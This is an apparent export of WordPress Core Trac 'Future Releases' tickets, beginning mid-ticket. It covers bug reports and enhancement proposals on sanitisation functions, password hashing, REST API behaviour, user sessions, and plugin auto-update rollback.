''Side-Notes:'' *`columnshidden` appears [`wp_ajax_hidden_columns()`][1] & [`get_hidden_columns()`][2] *client-side functionality appears to be here in [`common.js`][3] which checks for the [hidden table headers][4] ---------- Similar issues with the screen options can be recreated for different situations that have nothing to do with the tables. **Recreate similar issue on nav-menus.php** 1. Go to http://example.com/wp-admin/nav-menus.php 2. Uncheck all the fields in the *""Show advanced menu properties""* Screen-Options tab 3. Add the screen options filter to hide them from display: `add_filter('screen_options_show_screen', 'remove_screen_options_tab');` 4. Reload http://example.com/wp-admin/nav-menus.php All of the hidden advanced menu properties will now be broken and are all visible even though they were unchecked. I'm not sure if this is the same issue, but it appears that overall screen options have a high change of not working properly ---------- ---------- **Other-Notes** These issues of broken tables might also have to do with the same functionality problem of how screen options update/render: http://wordpress.stackexchange.com/questions/31154/wp-list-table-custom-quick-edit-box-post-meta-data-missing-and-columns-change http://wordpress.stackexchange.com/questions/123182/custom-admin-column-disappearing-when-using-quick-edit?lq=1 http://wordpress.stackexchange.com/questions/144361/wordpress-admin-wp-table-list-show-incorrectly #21016 [1]: https://github.com/WordPress/WordPress/blob/448275cce483138f53ccfa586b2d28b7fe8b0785/wp-admin/includes/screen.php#L55 [2]: https://github.com/WordPress/WordPress/blob/270a57075c290736387b6551670fde34fb3f1851/wp-admin/includes/ajax-actions.php#L1307 [3]: https://github.com/WordPress/WordPress/blob/448275cce483138f53ccfa586b2d28b7fe8b0785/wp-admin/js/common.js#L29 [4]: https://github.com/WordPress/WordPress/blob/448275cce483138f53ccfa586b2d28b7fe8b0785/wp-admin/includes/screen.php#L17 [5]: http://codex.wordpress.org/Plugin_API/Filter_Reference/manage_$post_type_posts_columns" codecandid Future Releases 54761 Save the prefered language from login page (since WP5.9) Login and Registration 5.9 normal normal Future Release enhancement new dev-feedback 2022-01-07T17:17:33Z 2022-04-09T08:18:57Z "Hello, On WP5.9 a language switcher is added in the wp-login.php. Here is the dev note by @audrasjb https://make.wordpress.org/core/2021/12/20/introducing-new-language-switcher-on-the-login-screen-in-wp-5-9/ I think it should be great if choosing a language here will update the Language user meta to display the back-office in the same language as previously chosen. As per 1st test made, this doesn't currently update." sebastienserre Future Releases 40440 Save permalink without send form Rewrite Rules normal normal Awaiting Review defect (bug) new close 2017-04-13T18:52:02Z 2021-12-19T16:37:58Z "if somebody open wp-admin/options-permalink.php, .htaccess are genereate and save without click submit button. I report this bug as security issue but during send messages with John Blackbourn we have determined that this isn't a security bug so I add ticket as public." sebastian.pisula Future Releases 33924 sanitize_html_class valid characters Formatting 4.4 normal normal Future Release defect (bug) new dev-feedback 2015-09-18T16:39:10Z 2022-09-20T23:57:53Z "`sanitize_html_class` excludes some increasingly common valid html characters. In particular the `@` character. The use of `@` may not be extremely common for class names but it is being encouraged by some pretty renowned folks in the area of class naming conventions. http://csswizardry.com/2015/08/bemit-taking-the-bem-naming-convention-a-step-further/#responsive-suffixes Actually pretty much anything is now valid for html classes except for spaces or tabs. I also use the `/` quite a bit in my classes but I thought I'd start with the `@` ." m-e-h Future Releases 50855 sanitize_file_name function not working as expected if there is '%20' in filename audrasjb* Formatting 5.4.2 normal normal Future Release defect (bug) accepted dev-feedback 2020-08-05T08:00:11Z 2022-10-07T21:04:13Z "We have added '%' as a special character in `$special_char` variable We are also replacing '%20' with '-' Here the sequence of str_replace was not appropriate We need to replace '%20' with '-' before all the special character are replaced Current behavior: - Filename Before: `this%20is%20example.png` - Filename after sanitization: `this20is20example.png` Expected behavior: - Filename Before: `this%20is%20example.png` - Filename after sanitization: `this-is-example.png` File reference: https://github.com/WordPress/WordPress/blob/master/wp-includes/formatting.php Function name: sanitize_file_name" dishitpala Future Releases 54190 sanitize_file_name disallows acute accents and left smart apostrophe Media 5.5 normal normal Awaiting Review defect (bug) new dev-feedback 2021-09-27T14:23:29Z 2023-10-04T19:21:40Z "The following change to line 1991 of wp-includes/formatting.php will disallow acute accents and left smart apostrophe in file names {{{ $special_chars = array( '?', '[', ']', '/', '\\', '=', '<', '>', ':', ';', ',', ""'"", '""', '&', '$', '#', '*', '(', ')', '|', '~', '`', '´', '!', '{', '}', '%', '+', 'ʻ','’', '«', '»', '”', '“', chr( 0 ) ); }}}" jdorner Future Releases 43723 Sanitize user_contactmethods output Administration normal normal Awaiting Review defect (bug) new dev-feedback 2018-04-09T14:12:16Z 2019-01-17T01:14:01Z "Data supplied in an array to the user-edit.php page via the filter 'user_contactmethods' is not properly escaped when it is outputted. As you can see in [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/user-edit.php#L527 user-edit.php] the values of the $name and $desc variables are directly echoed using echo. I'd expect it to use the WordPress Core [https://developer.wordpress.org/reference/functions/esc_attr/ esc_attr()] as the data is used part of an html tag's attribute and therefor should be limited to what is allowed inside an html attribute. " BjornW Future Releases 57021 Sanitize should accept broader types Formatting 6.2 normal normal Awaiting Review enhancement new close 2022-11-07T14:39:00Z 2024-02-07T20:21:43Z "by default $_GET/$_POST can be string|array type. All sanitize functions accept only string, which makes it necessary to validate $_GET/$_POST for `is_string` all the time before calling sanitize function to avoid PHP notices. Instead sanitize function should accept mixed param and validate string internally." kkmuffme Future Releases 41631 Same Term Not Added Taxonomy 4.8 normal normal Awaiting Review defect (bug) new dev-feedback 2017-08-13T20:24:40Z 2017-09-21T11:42:48Z "Using latest version of WordPress, default theme, all plugins disabled. Problem first appeared in version 4.8 and continues with 4.8.1. To recreate the issue: 1. Create regular post (“Posts”) 2. Add a new term to the Categories meta box 3. Save the term (it will appear on top of the list with a check mark next to it) 4. Add the same term again. Nothing happens and the term is not added Version 4.7.5 and below would activate the term and put to the top of list. This was helpful when adding a string of terms and some of them were already in the database. " vaprak Future Releases 47670 RSS widget creates an accessibility problem when used more than once audrasjb Widgets normal normal Future Release defect (bug) reviewing dev-feedback 2019-07-09T18:49:02Z 2021-11-12T17:46:02Z "Please consider the following patch to improve accessibility. Accessibility guidelines in WCAG's standard 2.4.4 Link Purpose requires that link text should provide a purpose or context for the link. In the RSS widget, the link text for the link to the RSS feed itself is an image of the RSS icon; its alt text is ""RSS"" which programmatically determines the link text. This passes the referenced standard. A problem occurs when multiple instances of the RSS widget are used. There are then multiple links with link text ""RSS"", each of which lead to different URLs. The text ""RSS"" then does not provide enough context for visitors to know what each ""RSS"" link leads to. The solution is the make each RSS link text unique to each feed's title, thus providing the necessary context. Simply prepending the title of the widget instance adds the necessary context to the link text without using any additional words which could has i18n issues. In class-wp-widget-rss.php (lines 89-91 in 5.2.2): From: {{{#!php <?php // lines 89-91 in wp-includes/widgets/class-wp-widget-rss.php (WP 5.2.2) if ( $title ) { $title = '<a class=""rsswidget"" href=""' . esc_url( $url ) . '""><img class=""rss-widget-icon"" style=""border:0"" width=""14"" height=""14"" src=""' . esc_url( $icon ) . '"" alt=""RSS"" /></a> <a class=""rsswidget"" href=""' . esc_url( $link ) . '"">' . esc_html( $title ) . '</a>'; } }}} To: {{{#!php <?php if ( $title ) { $title = '<a class=""rsswidget"" href=""' . esc_url( $url ) . '""><img class=""rss-widget-icon"" style=""border:0"" width=""14"" height=""14"" src=""' . esc_url( $icon ) . '"" alt=""' . esc_html( $title ) . ' RSS"" /></a> <a class=""rsswidget"" href=""' . esc_url( $link ) . '"">' . esc_html( $title ) . '</a>'; } }}} No harm is done when only a single instance of the RSS widget is used because the RSS link text is simply more explicit." tpaw Future Releases 6269 RSS Import Doesn't Properly Strip CDATA Tags Import 2.3.3 normal normal WordPress.org defect (bug) new dev-feedback 2008-03-18T00:58:13Z 2019-03-15T00:40:20Z "When importing an RSS feed that uses the <description> tag as opposed to <content:encoded>, I noticed that WP's RSS import doesn't strip the CDATA tags as it does for the <content:encoded>. =========Code Lines (83-87)=============== {{{ if (!$post_content) { // This is for feeds that put content in description preg_match('|<description>(.*?)</description>|is', $post, $post_content); $post_content = $wpdb->escape($this->unhtmlentities(trim($post_content[1]))); } }}} ===================================== I tweaked the code to solve the problem (see below) ==========Tweaked Code=============== {{{ if (!$post_content) { // This is for feeds that put content in description preg_match('|<description>(.*?)</description>|is', $post, $post_content); $post_content = str_replace(array ('<![CDATA[', ']]>'), '',$wpdb->escape($this->unhtmlentities(trim($post_content[1])))); } }}} ====================================== I'd be happy to submit a patch, except I'm not quite that savvy yet. It would be great it someone could incorporate it. Thanks." sweetdeal Future Releases 58281 Rollback Auto-Update (Rollback part 3) afragen Upgrade/Install 6.3 normal normal 6.6 enhancement assigned dev-feedback 2023-05-10T02:31:58Z 2024-02-21T18:22:14Z "This is Rollback part 3. It began with `move_dir()` in WP 6.2 for part 1. Part 2 was completed with #51857 in WP 6.3. This brings us to part 3. Part 3 is Rollback for auto-updates. When manually updating plugins if the plugin has a fatal error on reactivation, the plugin is prevented from reactivating. Unfortunately, during an auto-update, this reactivation check doesn't occur and the the next time the site runs users will see the WSOD. Rollback Auto-Update performs a similar re-activation check and if there is a fatal error it is captured in an error handler and the previously installed plugin is restored. If this occurs an email will be sent notifying the site admin of the failed update and rollback. After the rollback, the pending auto-updating for core and theme updates are restarted. This code is currently running for everyone who has the [https://wordpress.org/plugins/rollback-update-failure/| Rollback Update Failure] feature plugin installed. I personally have been testing this using a plugin that will fatal if the update occurs. The plugin is on my test site, active, and set to auto-update. I have been running like this since the beginning of the year. The PR is slightly different than the code in the feature plugin. Please test, run the feature plugin on your site, and review the code in the PR. Mostly give us your comments and feedback. props @costdev and @pbiron for continuing code review, rubber ducking, and sanity checks." afragen Future Releases 36939 Role groups Role/Capability normal normal enhancement new dev-feedback 2016-05-25T02:17:46Z 2019-06-04T21:23:29Z "WordPress's roles & capabilities API has support for allowing users to have multiple roles, and recent improvements to the Users list table have helped improve the administrator experience a bit by showing all roles rather than just the first one for each user. I think what makes multiple user-roles confusing (or maybe less valuable) is that WordPress by itself does not directly benefit from allowing users to have multiple roles, because the existing roles are designed to blanket all of WordPress's bundled functionality. I'd like to propose the introduction of Role Groups, as a layer that lives one layer above the main `WP_Roles` object to allow for groups of roles to be registered, enabling for users to have at least 1 role from each role group. ---- For example: * You install bbPress, and Bob cannot publish posts but can moderate the forums * You install WooCommerce, and Jane can contribute posts to the blog, and can also buy items from the store * You install BuddyPress, and while Chris can administrate posts, pages, and media, he cannot moderate the community In the above scenarios, each of these plugins would register their own role groups, and any user could easily have 1 role for each ""section"" of the same 1 WordPress site. ---- How could WordPress core use this? * Create a role group for Posts, Pages, Media, Comments, and Users * Ones ability to Edit posts should not assume they can moderate comments * Ones ability to moderate comments should not assume they can publish posts * Ones ability to upload media & attachments should not assume they can publish pages * Ones ability to edit an existing user should not assume they can upload media ---- How does this complicate things? Depending on how deeply this is implemented, potentially greatly, or not at all for vanilla WordPress installations. * If we keep WordPress's built-in roles identical to how they are today, they become 1 role group that grants access to Posts, Pages, Media, Comments, and Users; then plugins can define their own role groups, and we make sure WordPress has an adequate interface for assigning multiple roles for each user. * If we separate WordPress's roles into groups for each object type, backwards compatibility is a huge issue, as well as how confusing does it make granting access and assigning default roles for each group. * We may be able to remove the ""Default Role"" setting UI entirely, and leave it to plugins to reopen this functionality for improved support for multiple roles. ---- What do we do now? Let's talk this through, decide if it's worthwhile, and maybe work towards something viable. Much of this can happen without much (if any) modification to WordPress core. Worst case, we uncover more areas of WordPress that can be improved to support multiple roles per user, and address those in separate tickets. Best case, we make the existing roles & capabilities API more plugin-friendly." johnjamesjacoby Future Releases 21682 Rewrite endpoints are lost if a custom category or tag base is defined DrewAPicture Rewrite Rules 3.4 normal normal defect (bug) reviewing dev-feedback 2012-08-24T15:57:04Z 2019-06-04T21:07:44Z "== Problem == So this little bug was winding me up for a while. The standard approach according to the codex for adding rewrite endpoints is to call the `add_rewrite_endpoint()` function within the init hook. So far so good. The problem occurs whenever `WP_Rewrite::init()` is called ''after'' the init hook. It resets the endpoints array and so when rewrite rules are subsequently generated through the options-permalink.php admin page the rewrite rules are unknown to the system and hence don't work. `WP_Rewrite::init()` is called within `WP_Rewrite::set_category_base()`, `WP_Rewrite::set_tag_base()` and `WP_Rewrite::set_permalink_structure()`. In the latter it is only called if the permalink structure has changed so on first save of a change endpoints are lost. In the other 2 it is called every time if the slug doesn't match the default so rewrites are always lost. == Solutions: == 1. add an action hook to the start of `WP_Rewrite::rewrite_rules()` where endpoints should be added 2. store the endpoints at the start of `WP_Rewrite::init()` and restore them at the end 3. don't reset them at all I think solution 3 would make sense, the endpoints could be defaulted to an empty array and I can't see any reason to want to reset them anyway. I've attached a simple patch that works (for me at least). '''NB.''' this problem may also affect the `$extra_rules` and `$non_wp_rules` but I haven't tested that theory yet." sanchothefat Future Releases 53842 Review the type of select return values Build/Test Tools normal normal Awaiting Review defect (bug) new dev-feedback 2021-07-30T22:06:25Z 2021-07-30T22:06:25Z "In addressing ticket #46149, four tests were encountered which were testing (part of) a return value of WP Core functions, but were found to be using the wrong value type in this comparison. This was discovered due to the fact that the `assertContains()` method in PHPUnit uses strict type comparisons as of PHPUnit 8.0.2. For the time being, the tests will be updated to reflect the REAL return type per proposed commit https://github.com/jrfnl/wordpress-develop-official/commit/64dd09d5c292c3eac80419d5a1a325dab453a5ed This ticket is being opened to follow up on this as it should be investigated whether the return type of these WP Core function as-is is actually correct and the test update was therefore justified. Or whether the test update should be reverted and the actual WP Core functions should be updated. == Details === `Tests_Comment_GetPageOfComment::test_page_number_when_unapproved_comments_are_included_for_current_commenter()` and `Tests_Comment_GetPageOfComment::test_page_number_when_unapproved_comments_are_included_for_current_user()` Both these tests generate a comment ID using a test Factory class: {{{#!php <?php $new_unapproved = self::factory()->comment->create( $comment_args ); }}} `$new_unapproved` will now contain a comment ID as an integer. This integer is expected to be included in a list retrieved via the [https://developer.wordpress.org/reference/functions/get_comments/ `get_comments()`] function and filtered via [https://developer.wordpress.org/reference/functions/wp_list_pluck/ `wp_list_pluck()`]. Based on these two tests, the `comment_ID` as returned in the array retrieved via `get_comments()` is a string, not an integer. So the questions for these two tests are: * Should the `comment_ID` returned by `get_comments()` be a string or an integer ? * If the `get_comments()` function should remain unchanged, should the TestCase::factory()->comment->create()` method be adjusted to return a string for the ID value instead of an integer ? * If the answer to both the above questions is ""no"", no further action is needed once the proposed commit mentioned above has been committed. === `WP_Test_REST_Post_Meta_Fields::test_set_value_multiple_custom_schema()` and `WP_Test_REST_Term_Meta_Fields::test_set_value_multiple_custom_schema()` These two tests both update the post meta of a WP post via a REST API POST request. The data to be set is passed as integers: {{{#!php <?php $data = array( 'meta' => array( 'test_custom_schema_multi' => array( 2, 8 ), ), ); $request->set_body_params( $data ); $response = rest_get_server()->dispatch( $request ); }}} The test subsequently requests the post meta information via a call to [https://developer.wordpress.org/reference/functions/get_post_meta/ `get_post_meta()`] and ensures that the returned array contains both values. The values returned in the array from `get_post_meta()`, however are ''strings'', not integers. So the questions for these two tests are: * Where does the type change from integer to string happen ? * Is the data when set via the REST API being saved correctly ? * Does the Core code need to change or is the test update correct ? In this case, I suspect the type change ''may'' be due to the fact that all data received from `$_POST` will always be in string format, however, the handling of these API requests should be investigated to be sure. " jrf Future Releases 43812 Retrieving Blog/site description in multisite Networks and Sites normal normal Awaiting Review enhancement new dev-feedback 2018-04-19T16:38:51Z 2019-01-16T06:50:09Z "Hello, In a project on a Multisite I need on site 1 (for example) to retrieve description on site 2. With {{{ get_blog_details() }}} I'm able to retrieve some info (name, url...) but not the description " sebastien@… Future Releases 50027 Retire Phpass and use PHP native password hashing Security normal normal Awaiting Review defect (bug) new needs-unit-tests 2020-04-29T10:36:12Z 2023-10-13T01:11:52Z "PHP comes with built-in password hashing functions since PHP 5.5. Now that we have updated the minimum requirements to PHP 5.6, we can rely on PHP to provide us with password hashing mechanisms that ensures a cryptographically secure random numbers are are used for salt, and the hashes are backwards compatible. I created and maintain [https://wordpress.org/plugins/password-hash/ PHP Native Password Hash] plugin to swap WordPress's baked in Phpass with PHPs. **0.Phpass recommends to use PHP native hashing** > At this time, if your new project can afford to require PHP 5.5+, which it should, please use PHP's native password_hash() / password_verify() API instead of phpass. I propose that we upgrade the hashing mechanisms to password_hash()/password_verify/password_needs_rehash() combo. **1.We do not need to force users to change their passwords.** Phpass-hashed passwords have the signature `$P`, and the very old MD5 hashes are fewer than 32 characters long. We will inspect the signature first, and if the password is using the old standard, we will validate the password one last-time, and then use password_hash() to rehash it. From this point forward, that user is ""upgraded"" to the new mechanism. **2.Expose a filter for plugins** The plugin I maintain supports BCrypt, Argon2I, and Argon2ID for hashing. We can expose a filter that WordPress core emits so plugins can change the hashing algorithm if necessary. **3.Use BCrypt as the default algorithm** If a plugin does not take over, WordPress core will use BCrypt. BCrypt is secure, and is available in any PHP version 5.5, 5.6, 7.* and 8.*. **4.Do not remove Phpass** We will **not** remove Phpass from WordPress core. This is needed for backwards compatibility to ensure that existing users will eventually be updated. The end goal is that we seamlessly migrate active users passwords to better mechanisms without breaking functionality for existing users. Frameworks such as Drupal and phpBB (which used phpass in the past) have moved to better mechanisms since the minimum required PHP versions have been updated, and we can easily follow suit. If the maintainers agree, I would be overjoyed to collaborate on patches. " ayeshrajans Future Releases 34116 "Rethink default install content like ""Sample Page"", etc." General normal normal Awaiting Review enhancement new dev-feedback 2015-10-01T14:30:09Z 2021-04-10T11:17:18Z "New installs of WordPress come built in with ""Sample Page"", a default blog post, and a built in comment. I would like to propose that we rethink this content. In its current state, all it means is that any site owner needs to make some changes to their website, including either trashing or changing the sample page, editing the information in it and the sample blog post, and deleting the sample content. IMO, there are a variety of steps I'd prefer to take, but I'll rank a few in terms of what I think have few consequences to options that may be more of a difficult sell. 1. Change the name of Sample page to ""About"". Nearly every website has an about page. It's a much better option in my opinion. It's even the recommendation of the current sample page. 2. Delete the sample comment on Hello World altogether. People get web comments, this just has to be trashed on all new installs. 3. Change the status of ""Hello World"" to draft. It's not ready to publish, so let's not make it published. 4. Change ""uncategorized"" to ""general"" or something that's not so awful. (I know this has been discussed elsewhere a good bit but I'd be sad to not mention it) Currently the sample content is used as a defacto new user walkthrough. I would rather see proper new user onboarding, personally. But even if that's a step too far, I'd like to make some of these changes to the default content. Numbers 1 and 2 feel particularly doable to me, and 3 and 4 would be really nice additions." krogsgard Future Releases 58427 Retain existing user session when changing password Users 4.0 normal normal Awaiting Review defect (bug) new dev-feedback 2023-05-30T03:59:13Z 2023-05-30T04:45:30Z "When a user changes their password, their existing user session is ignored and a new session is started. This happens due to `wp_update_user()` not passing the current session token to `wp_set_auth_cookie()`. https://github.com/WordPress/wordpress-develop/blob/e82251df5bd59fb4327d0b0aa7a57ade20fe97c2/src/wp-includes/user.php#L2717-L2735 This can cause problems for some plugins which use the `attach_session_information` hook, or, which add additional information to the current session through `WP_Session_Manager::update()`. Other issues that occur is when the password is updated through the rest api, is that a new session will be created, but the response (and rest of the rest api processing) will be operating with the old session token, as that's what's set in `$_COOKIE`. So if any user fields in the rest-api response are reliant upon a piece of session metadata, it'll be incorrect for the following HTTP requests from the user. The workaround for plugins is to hook to `attach_session_information` and when a new session is being created for the current user, copy the current sessions metadata over to the new session. This is less than ideal, as it's not clear that the new session is definitely the same as the clients session (ie. The newly created session might not come from `wp_set_auth_cookie()` and might be a new session created for another purpose). PR attached, which retains the existing session when changing the password. " dd32 Future Releases 44805 Resurrecting post from trash reverts its slug Posts, Post Types 4.9.7 normal normal Awaiting Review defect (bug) assigned dev-feedback 2018-08-16T06:26:13Z 2018-08-30T00:53:02Z "=== Steps to reproduce Using the REST API: * Create a post * Delete the post (not forced) * Update the post's slug * Update the post's status to `publish` ==== Create `POST wp-json/wp/v2/posts` {{{#!json { ""status"": ""publish"", ""slug"": ""a"", ""title"": ""a"" } }}} ==== Delete `DELETE wp-json/wp/v2/posts/<id>` ==== Update slug `POST wp-json/wp/v2/posts/<id>` {{{#!json { ""slug"": ""foo"" } }}} ==== Update status `POST wp-json/wp/v2/posts/<id>` {{{#!json { ""status"": ""publish"" } }}} === Expected Post should be published with a slug of `foo` (the updated value) === Actual Post is published with a slug of `a` (the old value) " ajmccluskey Future Releases 41672 REST create user: existing_user_login is returned before existing_user_email shooper Users 4.7 normal normal Future Release enhancement assigned dev-feedback 2017-08-19T01:37:10Z 2021-11-08T20:17:57Z "When I post to `/wp-json/wp/v2/users` to create a user: {{{ { ""email"": ""brianhenryie@gmail.com"", ""username"": ""brianhenryie"", ""password"": ""password"" } }}} and a user with that username and email address exists, the response is: {{{ { ""code"": ""existing_user_login"", ""message"": ""Sorry, that username already exists!"", ""data"": null } }}} whereas a more useful response would be the existing_user_email response: {{{ { ""code"": ""existing_user_email"", ""message"": ""Sorry, that email address is already used!"", ""data"": null } }}} which is learned once the original POST is updated with a new username. i.e. existing_user_email tells a user if they already have an account. This information could be used to attempt to log in." bbrian Future Releases 48885 REST API: Support reading public settings, implement context handling spacedmonkey REST API 3.7 normal normal Future Release enhancement assigned dev-feedback 2019-12-05T17:09:25Z 2022-07-18T09:32:20Z "It would be good to make it possible to read and update individual site settings at `/wp/v2/settings/title` for example. This is needed as part of https://github.com/WordPress/gutenberg/pull/18760" scruffian Future Releases 40477 REST API: Does NOT Trigger New User Notifications! Users 4.7 normal normal Awaiting Review defect (bug) new needs-unit-tests 2017-04-19T07:35:19Z 2017-12-04T05:11:43Z "If you create new users with WP REST API. The notification for new WordPress users via email does NOT get triggered. I tried it on a fresh install. Used the [Email log](https://wordpress.org/plugins/email-log/) WP plugin to test that no emails were sent. " mrahmadawais Future Releases 38878 REST API: Default query for users endpoint doesn't scale REST API 4.7 normal normal Future Release defect (bug) new dev-feedback 2016-11-20T11:55:53Z 2019-07-11T18:34:11Z "The user query is performed with the `has_published_posts` argument which generates the following query > SELECT SQL_CALC_FOUND_ROWS wp_users.* FROM wp_users INNER JOIN wp_usermeta ON ( wp_users.ID = wp_usermeta.user_id ) WHERE 1=1 AND wp_users.ID IN ( SELECT DISTINCT wp_posts.post_author FROM wp_posts WHERE wp_posts.post_status = 'publish' AND wp_posts.post_type IN ( 'post', 'page', 'attachment', 'forum', 'topic', 'reply' ) ) AND ( wp_usermeta.meta_key = 'wp_2_capabilities') ORDER BY display_name ASC LIMIT 0, 10 'forum', 'topic', and 'reply' are bbPress' post types. We use bbPress on wordpress.org/support/ where I noticed in the logs that the server/database can't handle the request. I'm currently not sure how and if this needs to be fixed but having at least a ticket for it might help others." ocean90 Future Releases 56919 REST API term embed 401 - not allowed to view terms for this post REST API 6.0.3 normal blocker Awaiting Review defect (bug) new dev-feedback 2022-10-27T10:30:13Z 2023-10-29T05:52:08Z "Setup 1. WP 6.0.3 2. CPT attached with multiple taxonomies all of them registered as `show_in_rest` `true` When calling `GET` at CPT rest endpoint with `&embed=1` the path `_embedded.wp:term` returns 401 json object with error message `Sorry, you are not allowed to view terms for this post`. This issue is breaking my applications and I had to rollback to `6.0.2`" prionkor Future Releases 43209 REST API should take settings errors into account Options, Meta APIs normal normal Awaiting Review enhancement new dev-feedback 2018-02-01T23:59:10Z 2018-02-01T23:59:10Z "The `WP_REST_Settings_Controller` should notify the client when updating a setting fails due to an invalid value provided per the setting's `sanitize_callback` (should actually be validation, see related #43208). Currently this goes completely unnoticed. While `update_option()` doesn't return any information like that, it may be possible to use the information passed to `add_settings_error()` in case of a validity issue, and forward that to the client by returning a `WP_Error` with the message." flixos90 Future Releases 49871 REST API post link should be permalink for scheduled posts Permalinks 4.7 normal normal Future Release enhancement new dev-feedback 2020-04-10T19:13:25Z 2020-07-02T13:35:48Z "Scheduled posts now return something like this: {{{ { ""id"": 34, ""date"": ""2039-12-09T20:19:00"", ""slug"": ""message-from-the-past"", ""status"": ""future"", ""link"": ""https://example.com/?p=34"", } }}} But I believe it makes more sense to actually return the permalink as link: {{{ { ""id"": 34, ""date"": ""2039-12-09T20:19:00"", ""slug"": ""message-from-the-past"", ""status"": ""future"", ""link"": ""https://example.com/2039/12/09/message-from-the-past"", } }}} The only caveat is that we will need to create 301 redirects in case the slug changes (which is the case for published posts already). For example. if the slug becomes `old-message` the new link would be `https://example.com/2039/12/09/old-message`, but visiting `https://example.com/2039/12/09/message-from-the-past` should redirect to the new URL. There has been some discussion about this over here: https://github.com/WordPress/gutenberg/pull/21410#issuecomment-612132635" Jules Colle Future Releases 57088 Rest API improve time response with cache REST API normal normal Awaiting Review defect (bug) new dev-feedback 2022-11-12T12:29:53Z 2022-11-15T11:36:11Z "Hi, again :) I'm developing wordpress websites but only using the rest api, as Headless CMS. I've blocked the frontend, and created custom endpoints to be consumed by a React application. So, more than a year pass and I'm consumed by an issue on my websites, the rest api it's little slow like 300ms-1000ms of time response this is a lot. As I know, I can cache the responses using transient api, I've tried that, but without success. What is the best solution to avoid database access? 1. Should I create a wp-content/object-cache.php and cache the responses of endpoint? 2.Advanced-cache.php can help me to improve the response time of rest api? 3. do we have a method/hook/filter to check if cache exist before WordPress load everything /plugins/themes etc...? For example on https://developer.wordpress.org/reference/hooks/request/ and this hook, returns the response from cache without having to load every file from WordPress. I tried some cache plugins, but doesn't improve the speed? Any example to do this correctly, to improve the rest api time and database overload. Thanks " emanuelx Future Releases 36447 Responsive preview icons in Customizer need tooltips iamjolly Customize 4.6 normal normal Future Release enhancement assigned dev-feedback 2016-04-08T02:44:59Z 2021-11-09T15:43:27Z "The new icons at the bottom of the Customizer for toggling the preview window of your site really need tooltips to indicate what they're for. Just like the tooltips on the Visual Editor icons, other icons in the Dashboard should have tooltips as well. As leading usability expert Jakob Nielsen explains; >A user’s understanding of an icon is based on previous experience. Due to the absence of a standard usage for most icons, text labels are necessary to communicate the meaning and reduce ambiguity. https://www.nngroup.com/articles/icon-usability/ Even the Google Design Guidelines recommend tooltips for icons https://www.google.com/design/spec/components/tooltips.html# I originally raised this as a post on the [https://wordpress.org/support/topic/responsive-preview-icons-in-customizer-need-tooltips Beta forum] but it was suggested that since it's getting late in the 4.5 release cycle it would be best to raise it as a Trac ticket." ahortin Future Releases 36477 Responsive images (srcset) can include images larger than the full size Media 4.4.2 normal normal Future Release defect (bug) assigned needs-unit-tests 2016-04-11T13:27:58Z 2023-09-01T15:35:00Z "In many cases, I saw the resized and smaller images are much larger than the origin image, especially for the optimized images, it will make no sense to do that resize in this case, the worst case I've seen is about 13x larger than the origin and bigger image. If an example can help to explain the problem, please take this picture: https://cdn2.peterdavehello.org/wp-content/uploads/2016/04/status.png Many thanks!" peterdavehello Future Releases 57455 respond_to_request: store matched handlers across other methods, saving a call to get_routes(). REST API normal normal Awaiting Review enhancement new dev-feedback 2023-01-12T21:35:26Z 2023-01-19T23:25:46Z "== Current Behavior Out of the box, API requests (example: GET http://localhost:8889/wp-json/wp/v2/posts) will make two calls to `WP_REST_Server::get_routes()`. **Call 1**: `WP_REST_Server::dispatch()` -> `WP_REST_Server::match_request_to_handler()` -> `WP_REST_Server::get_routes()`. This is the main path used when serving the request. It gets the routes, matches to the request, then determines which handler will be used for the request. Later, `WP_REST_Server::respond_to_request()` saves the matched route and matched handler. **Call 2**: `rest_send_allow_header()` -> `WP_REST_Server::get_routes()`. This is used to set the allow header of the response (example: ""Allow: GET, POST, HEAD""). This header shows all HTTP methods that are allowed to be sent on the same route. This information was already found in the ""Call 1"" pathway above, but it was discarded. To find the allowed headers, `rest_send_allow_header()` calls `WP_REST_Server::get_routes()` which rebuilds information for all existing routes (but we only need information for one route). == Objective To reduce the number of calls to `WP_REST_Server::get_routes()` per single request from 2 to 1. While this only saves 0.1ms on a fresh site, on sites with large custom APIs, this could save 10ms or more. == Patch When `WP_REST_Server::match_request_to_handler()` -> `WP_REST_Server::get_routes()` finds the matching route, it will now not only remembers the exact matching handler, but all other handlers matching the route with different http methods. For example, imagine an ""/a/b/c"" route exists with GET and POST handlers. Previous to the patch, `match_request_to_handler()` would find the GET /a/b/c handler and remember it, setting it on `$response->matched_handler`. After the patch, a new variable `$response->all_methods_matched_handlers` is set containing the array: [ (GET /a/b/c handler), (POST /a/b/c handler) ], `rest_send_allow_header()` now looks for `$response->all_methods_matched_handlers` and uses it to set the Allow header if possible, saving a call to `WP_REST_Server::get_routes()`. This was my way to save the information found in call 1 and to pass it along to call 2, but I definitely open to other ideas of accomplishing the same thing. == Basic Testing Add a log message when get_routes is called: {{{#!diff --- a/src/wp-includes/rest-api/class-wp-rest-server.php +++ b/src/wp-includes/rest-api/class-wp-rest-server.php @@ -862,6 +862,7 @@ class WP_REST_Server { * `'/path/regex' => array( array( $callback, $bitmask ), ...)`. */ public function get_routes( $route_namespace = '' ) { + error_log( 'calling get_routes' ); $endpoints = $this->endpoints; if ( $route_namespace ) { }}} Query an endpoint: `curl http://localhost:8889/wp-json/wp/v2/posts` Before the patch: See two calls to get_routes After the patch: See one call to get_routes == Alternative Approaches #39473 adds a per-request cache to get_routes. I'd be happy to rework this if this is a better method. " mreishus Future Releases 41236 Reset Password button text during the registration process Login and Registration normal normal Awaiting Review defect (bug) new dev-feedback 2017-07-04T14:05:11Z 2017-07-06T08:51:21Z "After completing the registration form at wp-login.php, the user is sent a ""Your username and password"" email which contains a link to the reset password page. Here, the user can set a password. The button on the page reads ""Reset Password"". The button text doesn't quite make sense. The user isn't resetting their password; instead, they are setting a password for the first time. Something like ""Set password"" seems more appropriate. " henry.wright Future Releases 39687 Request headers sent incorrectly from `WP_Http` to `Requests` HTTP API normal normal Awaiting Review defect (bug) new dev-feedback 2017-01-25T12:02:48Z 2017-01-27T08:51:23Z "While having a closer look at Requests (and also the way it is used in WP), I noticed something that appears to be a bug. The `$headers` variable that is passed from `WP_Http::request()` to `Requests::request()` is an array of `$key => $value` pairs where `$value` may be an array itself in case multiple values for that header have been passed to `WP_Http::request()`. However, the Requests library expects each `$value` of the `$headers` array to always be a string, as it uses `sprintf()` with it directly (the passed `$headers` array is sent through `Requests::flatten()`). This can cause issues when specifying multiple headers of the same name." flixos90 Future Releases 43733 Replace Underscores.js with Lodash.js 